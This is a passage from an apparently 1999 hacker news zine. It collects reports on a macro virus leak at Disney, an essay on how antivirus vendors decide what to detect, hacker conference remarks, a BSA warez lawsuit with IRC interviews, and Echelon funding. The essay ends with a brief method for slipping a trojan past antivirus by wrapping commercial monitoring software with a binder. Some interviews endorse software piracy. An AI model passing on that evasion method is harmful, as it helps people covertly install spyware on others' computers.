Disney-speak) could attend the company's trademark theme parks for no
charge.
While the incident doesn't appear to have caused any harm, it underscores the potential for computer
viruses -- especially macro viruses -- to not only damage data, but to inadvertently publicize it as
well.
"There is a danger that any type of virus that sends out e-mail, especially macro viruses, could do
something like this," said Darren Kessner, a senior virus researcher at Symantec Corp.'s Anti-virus
Research Center.
The Melissa virus, which struck late last March, spawned a number of copycats, including Melissa.A
-- the variant that hit Disney.
When an infected document is opened, the virus infects the Word template file -- the starting point
for all new Word documents -- and mails the currently open document to the top 50 addresses in the
Microsoft Outlook address book.
Systems that are set to 'medium' or 'high' security will notify the user that a macro is being run.
Those systems that do not use Microsoft Outlook as a mail client will not send out the mass
e-mailing. The variant does not destroy any data on the infected system.
However, if a document is created on an infected system, mailed to another user, and opened with
Microsoft Outlook, the new document will be sent to the top 50 addresses on the new system. This
appears to be what happened with the Litvack document.
Erik Wedin is one of two Disney employees who inadvertently sent out the infected document to a
large number of press members. In an e-mail message to ZDNN, Wedin insisted that Disney uses
anti-virus software. "Our I.S. team is trying to figure out why (the virus) wasn't caught," he wrote.
"It's amazing that they didn't have more up to date anti-virus software in place," said Symantec's
Kessner.
While the incident highlights the danger of viruses causing information leaks at companies, Kessner
downplayed the danger of viruses being intentionally used for industrial espionage.
"This is not the best way," he said. "Furthermore, most virus writers are not interested in the
information they can get. They are more interested in getting their name out."
@HWA
37.0 How the Anti Virus Industry Works
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by RenderMan
So what exactly does it take for a piece of software to
end up in a virus scanning package as something to be
scanned for? Why is commercial spy software not
scanned but freeware tools that do the same thing are?
A new article in the Buffer Overflow section takes a look
at at the Anti Virus companies and what the criteria is.
Buffer Overflow
http://www.hackernews.com/orig/buffero.html
How the A/V Industry Works
By: Renderman,
Www.Hackcanada.com
RenderMan@Hackcanada.com
What do I remember most about DEFCON 7? The mosh pit
of Anti-Virus employees at the release of BO2K. Several
dozen A/V people from different companies, risking life,
limb and large insurance deductibles to get their company
the first samples of BO2K was one of the funniest things I
remember. At the time it made sense to risk injury to get
a copy, the media would reward the first company with a
BO2K detection signature with immense amounts of free
advertising, after all this was the latest and greatest
Trojan/backdoor, right? Well, after seeing Dildog's
presentation and the following open challenge to M$ to
recall SMS server, the general description of BO2K
changed. After initially trying BO2K on an isolated test
machine to make sure I didn't screw myself, it has now
become my primary method of remote administration on a
multiple system 9X/NT network because it is just a damn
good program. My opinion now; the anti-virus industry
people didn't need to be there. This was a well designed
remote control product that happened to be written by
hackers, and as with any tool, in the wrong hands it can
be dangerous.
In the months following defcon , products such as
Softeyes (http://www.softeyes.com), and Investigator
from Winwhatwhere (http://www.winwhatwhere.com/),
and other products that are designed to do much of what
the A/V industry says makes a program malicious are not
scanned for. When a products can advertise "watches and
records everything about every window that gains the
focus. It records every keystroke, program name, window
title, URL, User and Workstation and the optional 'Silent
Install' feature will run the installation silently and invisibly"
and not be scanned for, it begs the question, how do you
decide? Also you may recall the problems that the folks
over at NetBus had when they went commercial and
started charging for their product. They had a hard time
shedding the image of a hacking tool. This really rattled a
lot of peoples cages because the logic that was in use by
the people who are saying certain programs are malicious
does not make sense when you add these new programs
to the mix. Just looking at C|net's technology terror guide
(Technology Terrors) you can see the number of products
that aren't on any A/V list that are as dangerous, if not
more, than BO2K.
This whole thing boils down to the question; how do A/V
companies decide what criteria makes a piece of code
worth being scanned for?
Well, rather than rant on like others might do, I went to
the source. I looked on A/V sites for a policy statement or
a set of internal guidelines. Nothing found. So I sent a mail
like any other customer to the customer support
department (and if it existed, the A/V research
department as well) of the major A/V companies,
Symantec, NAI, AVP, Computer Associates, and Panda
Software. There were others that could also qualify, but
these are what you find most on store shelves. To all the
companies I sent the same letter:
Dear Sir/Madam,
With recent events in the virus industry, it
has become apparent to myself and many
others that there seems to be a definite bias
when is comes to how companies like yours
determine what should and should not be
scanned for.
By what policy do you decide what should be
scanned for and eliminated and what is
'legitimate'? After an examination of your web
site, no policy statement could be found. Can
you clarify by what criteria makes a product
malicious or a legitimate product?
Thanks
RenderMan
www.Hackcanada.com
As you can see, the letter states my conundrum and the
clarification I need, and I don't try to hide who I'm mailing
as. I waited a couple weeks for the responses to
accumulate and re-sent some that I did not receive
responses from. In over two weeks I only received 3
responses.
First was a very quick response from Symantec customer
support from a gentleman who really was having a really
bad day and I think and was not happy to see me. Here is
his message with my comments inserted
I can assure you that Symantec has
absolutely no bias towards any legitimate
software developers (What makes a software
developer legitimate, is there a license I'm
not aware of? I thought anyone could code?)
Arguments by some hackers that certain
hacker tools are actually legitimate commercial
software are themselves extremely biased to
the point of not making any sense (I agree we
are biased to a point just as you are, but
what makes something a hacker tool or a
mis-used administration tool?) A good news
recent story about this subject is available for
reading at this web page,
http://www.msnbc.com/news/287542.asp.
Both Symantec management and management
at other Anti-Virus developers are quoted in
this article about this subject. We really would
not have anything further to add to these
comments on this subject. (The article does
not really answer what I was asking.)
Best regards,
(name omitted)
After not answering my original question, I responded
because I thought they still had something they could
add. This time I went and asked exactly how they decide
what should and should not be detected and give an
example:
Interesting article you reference, but it still
does not answer my question.
What is your companies policy on determining
what should and should not be detected in
your Anti-Virus scans?
What is defined by your company as legitimate
software developers? Are independent
developers not in the same boat as large
companies such as yourselves?
What is preventing Back Orifice 2000 from
being a legitimate tool? In the article you
specified it says "anyone with the other half
of the Back Orifice software (the
administration tool) can control the victims PC
from anywhere on the Internet". Can not the
same be said for your product pcAnywhere?
I really appreciate you trying to clear this
question up for me.
RenderMan
www.Hackcanada.com
The bit about pcAnywhere was meant to try and get my
point across that the differences between good and evil
code are blurred. I myself have taken over the computers
of friends (with permision) who use PC Anywhere with out
passwords and the affect is just the same as using BO2K.
His response was less than pleasant, but interesting.
Again, here is a transcription with my comments:
I'm afraid that this is not at all a legitimate
question that you ask here. (I'm a customer,
I want to know so I can know if your product
will protect me from anything that can be
bad.)
You know, you aren't even giving me the
common courtesy of identifying yourself.
(ummm, I signed my name at the bottom,
that usually is all people do. The support
center never stated anything about needing
my full information in order to receive
customer support.)
Symantec Operates our discussion groups as a
support resource for our customers to use to
get help from us. They are not meant for
engaging in debates like this. (Whoa, hold on,
I really am a customer of Norton A/V, and I'm
asking a question, how do you decide what to
scan for? This is a customer inquiry.)
pcAnywhere in not designed to be to installing
silently and secretly in the background on a
system. It was also not announced at a
hackers convention. (So if it announces it's
presence but formats your drive without
asking it's OK? Since when does the location
of announcement mean anything about the
product itself?)
(name omitted)
After that, I let him get back to blowing off other
customers questions.
MS announced DirectX 2 at a conference done along the
theme of ancient Rome. Does this mean DirectX is a
technology for guys in robes and olive branches? I think
not. Fortunately this response from Symantec was not
indicative of all the responses I received.
NAI customer support responded quickly as well, this time
with a definite different tone.
If a program reproduces itself, we call it a
virus. If it does something that the user does
not expect, we call it a trojan. If it is harmless
and funny we call it a joke. (Not a bad though
short summary.)
There are other categories that could be
considered such as Hack tools, BackDoors,
worms and Password Stealers. (Now it gets
weird. Does L0phtCrack count as a password
stealer, or a hacktool, or as just another
damn good program?)
NAI wasn't clear but I was getting closer.
NAI also sent the 3rd and final response that really got me
thinking.
Thanks for your question. The criteria
although not obvious, is simple among
researchers. The detection's are mainly
customer driven, that is if a client requests
detection of a particular problem then it is
taken into account. Many of the detection's
received come from shared collections,
collections that are shared among A/V
vendors. Some of the detection's are from
samples received from customers and others
are from sites referred to us from customers
who feel there is a valid threat.
Regards,
(name omitted)
Sr Virus Support Analyst
AVERT - a division of nai
//* We eat viruses for breakfast, lock and
load *//
Ding, Ding, Ding, We have a winner. The last line "others
are from sites referred to us from customers who feel
there is a valid threat." So, the A/V industry uses a
common database and submissions from customers..... I'm
a customer and I want Investigator, softspy, pcAnywhere
and SMS scanned for. I submit to you samples of each to
add to your databases. There is no way to get BO2K off
the lists, the media just won't have it. But by using the
normal submission procedure for suspicious files, it may be
possible to add other programs of similar features to the
database and make the A/V industry re-think itself.
I encourage everyone who has legitimate access to any
program that can be used maliciously, submit it to the A/V
industry through their virus submission e-mail addresses. A
hacker's version of a letter writing campaign. 1 person
submitting these programs will be labeled a crackpot,
many on the otherhand will have an effect.
I for one want a level playing field. If there is a program
on my system that can record my keystrokes, passwords,
bank account numbers and ship it off anywhere without
telling me, I want to know about it.
If a person wanted to use a trojan for nefarious purposes
they need just be a little creative. Just spend the $100 or
so on Investigator or a similar program, use something like
Silk Rope to wrap the executable with some benign little
program and deploy at will. This is a common tactic used
to deploy trojans but with this method, not a word will be
uttered by any A/V product and the attacker can go along
on his merry way unfettered. So unless the A/V industry
changes it's position on what makes a piece of code
malicious, smart trojan users will fly on by using
'legitimate' products. But why should they scan for those
products? After all, they weren't released at a hacker
convention :-)
RenderMan
www.Hackcanada.com
RenderMan@Hackcanada.com
@HWA
38.0 FBI Releases Anti Cyber Crime Video
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Space Rogue
The FBI has released a new video aimed at the
high-tech industry across the country. It is hoped that
the tape will encourage companies to report computer
break-ins to the federal government. The tape contains
scenes showing government officers catching three
California teens who had electronically broken into
numerous computer networks in the Pentagon. The FBI
says that not enough firms are reporting computer crime
to the federal government and are instead covering
them up. (First they say they are overworked and
understaffed, now they want even more work to do.
Yeah, makes sense to me. Anyone know how to get a
copy of the tape? I need a good laugh.)
Yahoo News - Anyone have a better link for this?
http://dailynews.yahoo.com/headlines/local/state/colorado/story.html?s=v/rs/19991118/co/index_2.html#3
Late Update 0948111999EST
Thanks to devost for sending us a better link. We now
know that the title of the video is "Solar Sunrise: Dawn
of a New Threat" and should be available at better FBI
offices everywhere.
Excite News
http://news.excite.com:80/news/u/991117/19/tech-infowar
Yahoo;
F-B-I Makes Hacker Video - (STATEWIDE) -- The F-B-I has made a new video aimed
at the high-tech industry in Colorado and across the country. The tape is supposed
to encourage companies to report computer break-ins to the federal government. It
shows government officers catching three California teens who had hacked their way
into at least 11 computer networks in the Pentagon. Right now... the F-B-I says...
most firms hire private companies to track down hackers. But the federal government
says...reports of computer break-ins are crucial to national security.
-=-
Excite;
Feds put happy face on infowar
Updated 7:14 PM ET November 17, 1999
By PAMELA HESS
WASHINGTON, Nov. 17 (UPI) As part of an effort to sell industry on its
nascent computer crime investigation unit, the FBI has just completed an
entertaining, slick video detailing how they caught three teenagers who
were behind the famed February 1998 information warfare attack on at least
11 Defense Department networks as the military prepared for a renewed war
on Iraq.
The Pentagon considers the incident, known as Solar Sunrise, the opening
volley in a new age of warfare that exploits personal computers and the
Internet to cripple military operations. A similarly notorious attack
known as Moonlight Maze is still ongoing and is believed to be
coming out of Russia. That case has not yet been solved.
The video, "Solar Sunrise: Dawn of a New Threat," recounts how two
California teenagers, coached by an Israeli teen hacker known as
"Analyzer," routed through scores of networks to gain entry into
unclassified Defense Department networks that housed sensitive troop
deployment and logistics information.
The hackers started on Feb. 3 and were tracked down by Feb. 25. The
California boys are on three years of probation. The Analyzer is under
indictment in Israel but is currently fulfilling his military service.
The video was publicly shown for the first at a cyberterrorism conference
in Washington, D.C., on Tuesday.
A government official who asked not to be named explained that the video
would be distributed to local FBI detachments to help them convince local
law enforcement authorities and private companies to alert the FBI when
computer break-ins occur.
Concern exists in industry especially in the financial sector, where
public perceptions can immediately affect the bottom line that bringing
the FBI into a case of hacking increases the chances the incident will
leak out to the public. In many cases, they have preferred to handle
it with private security firms.
The FBI considers knowing about the incidents critical to national
security. Hackers do not target government agencies alone; they also
bounce off private networks. Tracking that activity can provide important
indications of coming major attacks, both cyber and physical, they
contend.
39.0 Adobe Introduces Potentially Flawed Security System
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by RABID.RAT
Adobe has introduced what they call a secure digital
delivery system which they hope will prevent the
unauthorized distribution of PDF documents. Adobe hope
to accomplish this by using the unique serial number
located on Zip, Jaz, or Clik disks as a component of their
encryption system. (Ok, for those that are unfamiliar
with encryption, this whole scheme is based on a
secret number, the unique serial number on the disk.
This number is "inaccessible to end users" according to
Adobe. Of course if the Adobe software can access the
number then an end user may be able to figure it out
to. Once you have the number it should be pretty
trivial for a good cryptographer to figure out the rest.
This is really pretty sad.
Adobe
http://www.adobe.com/epaper/features/iomega/main.html
Note: We have not actually looked at the encryption
mechanism used by Adobe and have based the above
comments only on what little information is available on
their web site.
Adobe;
ADOBE TEAMS WITH IOMEGA TO OFFER A SECURE DIGITAL DELIVERY
SYSTEM
By Lisa Anderson
Do you own any disks containing sensitive or copyrighted content? If
so, do you worry that someone could illegally copy and use that
information?
Adobe and Iomega have teamed up to answer this common concern
with a secure digital delivery system that prevents unauthorized
distribution of Adobe� Portable Document Format (PDF) files stored
on portable media.
Adobe is helping publishers, distributors, retailers, and consumers to
exchange electronic content securely by tying the use of that content
to specific types of portable media and hardware. Iomega,
manufacturer of the popular Zip disk, has encoded every portable Zip,
Jaz, and Clik disk with a unique serial number. The serial numbers
are stored in a part of the disk that is inaccessible to end users, so
the numbers cannot be modified.
As part of a new cooperative alliance, Adobe is licensing code from
Iomega that lets Adobe's Web Buy software extract the serial
number from any Iomega disk, and use that number as a component
of Adobe's encryption system. That makes Iomega's disks function
as secure portable storage devices.
The two technologies work together to emulate the way we use
physical books today. "Instead of sharing your paperback or your
document, you'll be able to share your disk, but only one person at a
time will be able to read that 'book,'" says Germaine Ward, vice
president of software solutions at Iomega Corporation.
@HWA
40.0 The 'Enemy' Speaks at Security Conference
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by bluemiracle
The Computer Security Institute as part of its
symposium on information security earlier this week
hosted a "Meet the Enemy" session. Aleph 1, Mycroft,
Maelstrom, and K0resh participated on the panel in front
of over 200 administrators from government, the
military, hardware and software manufacturers, financial
services companies and e-commerce shops. (Enemy,
what a derogatory term, thanks.)
APB News
http://www.apbnews.com/newscenter/internetcrime/1999/11/17/hackers1117_01.html
Hackers 'Meet the Enemy' in D.C.
Confront Computer Security Pros at Conference
Nov. 17, 1999
By James Gordon Meek
WASHINGTON (APBnews.com) -- Hackers
say they are misunderstood by the public, but
they love publicity.
They say they are not dangerous, but warn
computer users to put tighter computer
security measures in place.
They say they are not always interested in
criminal activity such as theft, destruction or
espionage. They hack out of intellectual
curiosity and voyeurism.
In an unusual give and take staged at a
Washington hotel last night, a dozen
unrepentant hackers explained why they penetrate computer systems.
It's for fun, for notoriety -- and for curiosity so insatiable that they risk
federal criminal charges for unauthorized intrusions, they said.
200 experts listen in
Staged by the Computer Security Institute as part of its symposium on
information security this week, the hackers beamed into the Marriott
Hotel's ballroom on an audio conference call to be pitted against an
audience of about 200 in what was billed a "Meet the Enemy" session.
Those seated in the large hall said they work for the government, the
military, hardware and software manufacturers, financial services
companies and e-commerce shops.
One by one they questioned hackers identified only by their Internet
"handles," pitting law enforcers against lawbreakers in a friendly discussion
that organizers said was meant to elevate cyber-diplomacy.
The hackers appeared confident and cynical, demonstrating a consistent
streak of black humor that kept attendees snickering all evening. The
computer security experts seemed awed by the young snoops, regarding
them almost as celebrities.
Defacing a site is afterthought
Early on, a questioner asked about the widely reported defacements of
public Web sites, where peculiar slogans and images on sites operated by
the FBI, Congress and other government institutions appeared to be
politically motivated.
A hacker who identified himself as Elias Levy said the defacements are
often an afterthought to a successful intrusion meant to get publicity.
"It gives the media an excuse to make up more words like 'hacktivist,'"
scoffed another.
Though characterized as "media devils," several said the press is
considered indispensable to hackers who want their exploits online to be
recognized by the public and the Internet "underground."
Aiming for publicity
A hacker called Microft answered a query about target selection by saying
there are several considerations: "You're going look at several things, such
as access, connectivity or publicity -- media content."
Defacements are typically signed by an intruder's identifying handle.
Most of the participating hackers said they had more than a decade of
experience pinging computer networks, and several admitted they had
more or less gone straight and now work as security consultants.
British hacker Maelstrom said, "People get caught, people decide they
don't want to get caught, or people grow up and just change."
"A lot of people get busted and go to jail, have their stuff taken and have to
start over again," said another named K0resh. "I'm 29, and I don't want to
start over again."
Tempted to join the dark side
But the reformed hackers are tempted regularly to join the dark side, and
they still creep around the shadowy underbelly of the Internet.
All claimed to have received solicitations -- often in person -- from foreign
intelligence, federal agents and corporate operatives seeking competitors'
information, such as design prototypes. The hackers said they are
regularly offered thousands of dollars to make illegal intrusions.
"I get propositioned on a daily basis to hack things," Maelstrom said.
When approached, "I get this little 'Spidey Sense' thing that tells me this is
trouble," said K0resh. "I don't think too much about it. I just tell them no,
and go on my way."
Can break into almost anything
The basic assumption by the solicitors or undercover agents conducting
sting operations is that skilled hackers can gain access to almost
anything. And their assumption is correct, according to this bunch.
One hacker said no system is "bulletproof," but computer networks can be
reasonably fortified with firewalls and other measures.
An inquisitor asked: "Is there anything you can't break into?"
"Bananas," Microft joked. "And kiwis are very hard to peel."
Helping to debunk myths
Tuesday's hacking summit was organized by
ponytailed security consultant Ray Kaplan,
who said the 10th-annual meeting is designed
to debunk the mythology about hackers as
always engaged in criminal activity.
"In my experience, the term 'hacker' is much
maligned, abused, misused and otherwise
misunderstood," he told APBnews.com.
What motivated him to facilitate the Meet the Enemy conference each year
is a desire to share knowledge and understanding. The hackers "like to
help the so-called legitimate security community to understand the
underground," he said.
Millennium bug feared
Participants on Tuesday repeatedly demanded to know if there was any
truth to rumors that problems caused by the millennium bug might result in
widespread computer attacks, intrusions or theft.
When asked the greatest Y2K-related vulnerability to computers, hacker
Maelstrom replied, "The greatest vulnerability is that people are paying too
much attention to that [question], and not spending enough money on
security."
Another tried to reassure the audience that hackers are not likely to raid
computers worldwide after the potentially devastating date rollover.
"Most hackers will be really drunk on New Year's Eve, so you'll all be pretty
safe."
James Gordon Meek is an APBnews.com staff writer in Washington
(james.meek@apbnews.com).
@HWA
41.0 Defense Fund Started for Warez4Cable + interviews.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by |DiSk|
The recent crackdown on Newnet by the Business
Software Alliance has resulted in several arrests for
copyright violations. In response fellow Newnet patrons
are organizing a fundraiser to help out the
"#warez4cable" members. Anti-BSA.org also has
interviews with some of the affected people.
Anti-BSA.org
http://www.anti-bsa.org/
SOFTWARE WATCHDOG ATTACKS CYBERPIRACY
BSA Files Lawsuit Against 25 Individuals for Alleged Piracy in High-Speed IRC Channel; Seizes Computers in
California and Michigan
Washington, D.C. (11 November 1999) -- The Business Software Alliance (BSA) today announced it has launched
a new initiative aimed at shutting down illegal trafficking in software on the Internet. As part of the initiative, BSA
has filed a lawsuit against twenty-five individuals allegedly participating in the "warez4cable" IRC channel, an
Internet forum used to traffic in pirated software. This is the first lawsuit ever filed against individuals for pirating
software in an IRC channel.
In the past week, under the supervision of U.S. Marshals, BSA carried out unannounced inspections of computer
equipment at residences in Sacramento and Downey, CA, and in Troy and West Bloomfield, MI, seizing five
computers. Under U.S. law, all twenty-five defendants named in the lawsuit are potentially liable for damages up to
$100,000 per copyrighted work infringed.
"Because of the increased access to high-speed connections, piracy in IRC channels is fast becoming one of the
most popular ways to traffic in illegal software on the Internet," said Bob Kruger, vice president of enforcement for
BSA. "That is why BSA is taking immediate action against this aggressive form of piracy," continued Kruger.
The lawsuit results from months of intensive investigation by BSA's Online Investigative Unit. By using a special
subpoena procedure created by the Digital Millennium Copyright Act enacted by Congress in 1998, BSA was able to
identify the individuals named in the suit and take legal action against them. The lawsuit adds a new dimension to
BSA's Internet anti-piracy campaign that to date has involved the shutting down of thousands of warez web sites
and working closely with law enforcement to promote criminal prosecutions.
"This lawsuit is part of BSA's on-going campaign to keep the Internet from becoming a safe haven for the conduct
of software piracy," said Kruger. "Anyone who thinks that they can hide behind the anonymity of the Internet to
commit copyright infringement had better know that the
law gives them no quarter," continued Kruger.
THIS JUST IN -- Activision rumored to have joined BSA
-=-
Interviews with key people in the #warezforcable bust:
Pandora;
First i'd like to say that there are certain questions about the specifics
of my "activity" that I cannot answer. We are still in settlement
negotiations and I'm really not supposed to be talking about the case.
I'll answer what I can.
[data] Is it true that you were busted for distributing Pirated Software?
It's true that I'm being sued by the BSA for copyright infringement, yes.
[data] how did you find out that you were under investigation?
Hmm, I didn't until Nov 5th when three U.S. Marshall, two lawyers and two
computer forensics pounded on my door at 7:30AM.
[data] did they explain how they caught you?
We were served with REAMS of legal documents that include a statement from
the BSA Investigator explaining how he logged on to several fserves and
downloaded software, etc. He states that W4C has been under surveillence
since June.
[data] do you have the IPs that logged in logged? has any .bsa.org ip ever
logged in?
I don't, but from the screenshots he enclosed you can see that he was
using the nicks cdc4u and dawn.
[data] Im surprised pacbell released your presonal info.
Well, under some bill that was passed a couple years ago the BSA was able
to subpeona our ISPs for our information.
A little added information: During their raid on our home 3 computers and
2 CDs were seized. The computer forensics spent FOUR HOURS in our
apartment trying to make directory listings of what was on each of the
computers. On more than one occassion they needed the assistance of
myself or Caine/Abel in doing so. A few days later our lawyer told us that
the dir listing they'd made were somehow CORRUPT (read as: they didn't
know what they were doing). A week and a half later we do not have our
computers back and have yet to hear from them what exactly they want in
this settlement. We have agreed to sign an Injunction that orders us not
to download, distribute, use and so on, unlicenced software. We possibly
won't get our computers back, and it's likely that they will ask for a
monetary settlement. Scarily, the law allows them to fine us $100,000 PER
piece of software should we be convicted of copyright infringement. At
this point in time we've already spent over $1000 on lawyer fees alone.
I also want to send out a big THANKS to all who have supported us through
this. To all the old friends who have called or contacted us, and to all
those out there wishing us the best... we appreciate you more than you
know. Thank you.
If you have any other questions, please ask. I want it to be clear to all
what is really happening since there seems to be a lot of speculation and
rumor going around.
BY THE WAY!!
Some pertinent info you might want to know. For DAYS I couldn't stop
asking "Why us?? Why me??" As you're well aware there are bigger channels
and groups out there than W4C, it didn't make any sense that the BSA was
targetting us. Well, do you remember a guy named SirSlappy? General
trouble maker on NewNet?? Apparently he report myself and Caine to the
BSA, which started this huge disaster. I hope he's on everyone's
blacklist.
-=-
Etamitlu founder of #warezforcable
[data] Hello
[Etamitlu] hey, sup?
[data] is it true you were a #warez4cable cofounder?
[Etamitlu] yes, i was a cofounder along with a few others
[data] What did you notice strange in the channel before the incodent?
[Etamitlu] well, we never really noticed anything *strange*
[Etamitlu] but, Appz350 did come in and say that "Microsoft busted him" a couple weeks before it happened
[Etamitlu] we didn't believe him because Microsoft obviously can't arrest him
[Etamitlu] but maybe their was some truth to that
[data] Maybe
[Etamitlu] that's all that i cna think of that was strange before it happened
[data] Why do you think what the BSA did was wrong?
[Etamitlu] it was wrong in my opinion because catching 25 of us won't do anything.. i mean we're the small guys
[Etamitlu] if they really want to put a stop to piracy they need to go after the release groups
[Etamitlu] also, we were on newnet
[Etamitlu] there are something like 4000 people on newnet
[data] Do you know where to go after the release groups? I image it would be hard
[Etamitlu] they could have made a MUCH larger impact if they had gone after dalnet with nearly 10 times as many people
[Etamitlu] well yeah, it would be fairly hard.. but paradigm was busted once if im not mistaken
[data] who closed the channel? When? and Why?
[Etamitlu] who closed #warez4cable?
[Etamitlu] well
[Etamitlu] we were supposed to have an op meeting last Thursday night
[Etamitlu] all day that day people were flooding with messages like "THE FBI IS HERE! LEAVE NOW!!!"
[Etamitlu] so it was obvious that we were dead because everyone was leaving
[Etamitlu] and all of our ops were puzzled, leaving, and asking questions
[Etamitlu] so we had a founder/cofounder meeting and decided to shutdown the channel
[Etamitlu] we just set it +im and banned everyone
[data] Were any founders/cofounders busted?
[Etamitlu] no, they were not
[Etamitlu] surprisingly, they were not
[Etamitlu] however
[Etamitlu] Caine and Pand0ra had been high ranking w4c members in the past
[Etamitlu] and they were the first caught
[data>] Yes and their houses were raided.. the interview is at www.anti-bsa.org/interview2.html
[Etamitlu] other than that, no founders'/cofounders were caught
[data] Im sure the BSA will be in the chan, is there any message you would like to leave them?
[Etamitlu] i'd just like to let them know that they made a big mistake here and that this won't even help to stop a fraction of piracy
-=-
|{rypto
[data] Hello
[data] Is it true you are being served for serving warez in #warez4cable?
[|{rypto] Yeaps
[data] How/when did you find out?
[|{rypto] umm, November 12, 1999
[data] and how?
[|{rypto] by Fedex
[data] How did they say they caught you?
[|{rypto] They went into my fserve w4c-krypto and saw what i had and got 4 counts on me
[data] I see
[data] what did they tell you the punishment will be?
[|{rypto] a bunch of shit...promise to never to it again, they want the PC, and money
[data] IF they had warned you... would you have stopped?
[|{rypto] Hell YEAH
[data] how old are you?
[|{rypto] 18
[data] As you know, many channels have closed because of these law suits. If the bsa had gone after one of the groups, or only one or two of the servers as opposed to 25, would people have been as worried?
[|{rypto] Yeah i think so becasue people would have looked up BSA and seen what they do
[data] Were you aware that this could happen when you joined #warez4cable?
[|{rypto] I wasn't really aware of the consequences
[data] Must have been horrible for you
[|{rypto] yeah it is but lucklly i have the smallest case of them all
[data] do you have any idea the IPs or the nicks of the 'BSA spies'?
[|{rypto] yeah dawn,cdc4u
[data] you have their IPs?
[data] or, isps
[|{rypto] no sorrry
[data] okay
[data] any last message to any BSA members and the internet surfing public?
[|{rypto] Yeah stop were just having fun
[data] Thanks a lot
[data] good luck on the case
[|{rypto] thanx
-=-
SirSlappy
Session Start: Tue Nov 16 22:15:43 1999 * Logging SirSlappy to 'SirSlappy_19991116.log'
[sh0rt] can i speak to you, on the record?
[SirSlappy] sure
[sh0rt] what do you have to say about pand0ra accusing you of blowing the whisle...ratting on w4c to the bsa
[sh0rt] ?
[SirSlappy] well.
[SirSlappy] you ready to quote me on this shit?
[sh0rt] yes
[SirSlappy] I think it's halarious
[SirSlappy] and don't ask any questions for a while
[sh0rt] is it true?
[SirSlappy] because..
[SirSlappy] I'm going to be typing some shit
[sh0rt] okay
[sh0rt] type away
[SirSlappy] and you can put it on the web page for all the pricks that fuckin /msg me every fuckin day trying to start shit
[sh0rt] go ahead
[SirSlappy] to the bitches out there that want some of the Slapper... Come get some.. No one can fuck with me or my l33t Vhosts
[SirSlappy] now.. to the business
[SirSlappy] 1st of all. No!, I did not report anyone to the BSA. I had no desire for anyone on IRC to get in trouble
[SirSlappy] yes, I take over channels and hack shit and do lame shit..whatever. but that is on the internet.. That isn't in real life
[SirSlappy] I would NEVER report anyone on IRC. Maybe from AOL. (maybe).
[SirSlappy] but.. I would NEVER report ANYONE Anyway...
[sh0rt] what would you like to say to pand0ra?
[SirSlappy] I have no desire to.
[SirSlappy] I would like to tell her..
[SirSlappy] um..
[SirSlappy] how the hell did you come up with my name? There is no log of me being in that channel
[SirSlappy] I never had anything against W4c
[sh0rt] why do you think pand0ra believs you were the one who ratted on w4c?
[SirSlappy] well. I take that back.
[SirSlappy] I did.. about a fuckin year ago. and that's another story in itself
[SirSlappy] I think it's because I took over the #W4c channel
[SirSlappy] like.. 8 months ago
[SirSlappy] or something
[SirSlappy] that's the only reason I can think of that she would say I did it
[sh0rt] do you agree with what the bsa is doing?
[SirSlappy] well...
[SirSlappy] I think that the software companies bring warez upon themselves
[SirSlappy] I am for warez.. at least until the software companies make software a better deal
[SirSlappy] like.
[SirSlappy] if you want to buy software.. It's like 50 bucks for a shitty program
[SirSlappy] and once you buy it.. there's no taking it back
[SirSlappy] that sucks a dick
[SirSlappy] you can't resell it
[SirSlappy] you can't do shit with it.. it's yours..forever.
[sh0rt] do you serve warez? have you ever served warez?
[SirSlappy] I plead the 5th on that question
[sh0rt] understandable.
[sh0rt] thanks for your time.
[SirSlappy] I'm here to help
[SirSlappy] :)
[sh0rt] any final words?
[SirSlappy] yes.
[sh0rt] shoot
[SirSlappy] to all of you lamers who feel you need to /msg me on IRC telling me that I'm a snitch.. etc etc.. why don't you save that shit. I'm sick of hearing it
[SirSlappy] not done
[SirSlappy] do you really think the BSA is gonna come crashing in someone's door because 1 person called them up?
[SirSlappy] do you think they just said.. "shit!! there's warez on IRC .. SirSlappy said so!! let's go get em!"
[SirSlappy] I doubt it
[SirSlappy] that's all
[SirSlappy] thanks for the interview
[sh0rt] alright.
[SirSlappy] :)
[sh0rt] peace
[SirSlappy] yep
Session Close: Tue Nov 16 22:28:24 1999
@HWA
42.0 Menwith Hill To Get Upgrade Monies
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by seventh
The fiscal 2000 Intelligence Authorization Act contains
language that would indicate that an undisclosed
amount of funds have been earmarked for upgrades to
the Menwith Hill signals intelligence listening post in
England. Menwith Hill is widely suspected of being one
of the central European-based listening posts for the
Echelon system, an global surveillance network
sponsored by the NSA.
Federal Compuster Week
http://www.fcw.com/pubs/fcw/1999/1115/web-echelon-11-18-99.html
NOVEMBER 18, 1999 . . . 11:59 EST
Intelligence bill targets NSA, Echelon upgrades
BY DANIEL VERTON (dan_verton@fcw.com)
A bill that would authorize appropriations for the fiscal 2000 operations of the
U.S. intelligence community includes funding for infrastructure upgrades at a
key facility in what many suspect is a global, electronic surveillance network.
According to language in a joint report on the fiscal 2000 Intelligence
Authorization Act, an undisclosed amount of funds have been earmarked for
upgrades to the Menwith Hill signals intelligence listening post in England. The
top-secret facility is widely suspected of being one of the central
European-based processing centers for the "Echelon" system, an electronic
surveillance network sponsored by the National Security Agency.
The Cold War-vintage global spy system consists of a worldwide network of
clandestine listening posts capable of intercepting electronic communications
such as e-mail, telephone conversations, faxes, satellite transmissions,
microwave links and fiber-optic communications traffic. Known as Echelon, the
system came under attack last year after the Scientific and Technological
Options Committee of the European Parliament pledged a full-scale
investigation into suspected NSA privacy abuses ["European Union may
investigate U.S. global spy computer network", fcw.com, Nov. 17, 1998].
Commenting on the floor of the House, Rep. Porter Goss (R-Fla.) praised the
House/Senate conference report, which was agreed to Nov. 9, for its insistence
that NSA be made to account for its methods of intercepting electronic
communications. "We direct...the NSA to report in detail on the legal standards
that it employs for the interception of communications," Goss said.
